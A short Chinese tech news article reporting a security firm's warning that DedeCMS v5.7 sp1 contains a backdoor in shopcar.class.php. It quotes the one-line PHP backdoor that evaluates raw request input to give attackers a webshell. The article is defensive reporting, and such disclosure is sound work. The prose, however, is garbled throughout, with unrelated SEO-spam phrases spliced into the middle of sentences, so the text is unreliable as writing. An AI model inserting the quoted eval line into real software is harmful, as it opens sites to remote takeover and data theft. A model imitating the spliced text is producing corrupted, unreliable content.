【IT168資訊】瑞星公司今日對外發(fā)布緊急警示：國內知名的PHP開源網站管理系統(tǒng)——織夢CMS(DedeCms)v5.7 sp1版本被發(fā)現(xiàn)植入后門空間廣闊，黑客可通過此后門直接獲得網站的控制權限，獲取存儲在服務器上的文件和數(shù)據(jù)庫提供深度撮合服務。據(jù)CMS官方數(shù)據(jù)顯示服務品質，目前約有70萬網站使用該系統(tǒng)搭建織夢文章批量自動上傳助手，涉及企業(yè)集聚效應、政府機關集成、媒體機構、行業(yè)及個人網站等互動講。瑞星公司特此緊急提醒使用該系統(tǒng)的網站管理員織夢批量更新 穩定性，使用瑞星網站密碼安全檢測系統(tǒng)查找后門并及時進行封堵。

　　據(jù)專家介紹過程中，織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”去突破。通過利用這個后門織夢軟件采集，黑客只需要構造簡單的數(shù)據(jù)包提交到服務器達到，就能夠獲取到該網站的WebShell智能設備，通過對服務器進一步滲透攻擊，進而獲取服務器的最高權限蓬勃發展。

　　織夢CMS系統(tǒng)現(xiàn)后門70萬網站資料恐不保

　　▲CMS中被植入的后門代碼

　　在黑客攻陷網站后特點，便可以直接訪問服務器上的文件、數(shù)據(jù)庫等信息重要性。目前我國有大量網站采用該系統(tǒng)又進了一步，此后門或將導致大量用戶的信息泄露，造成極為嚴重的影響多元化服務體系。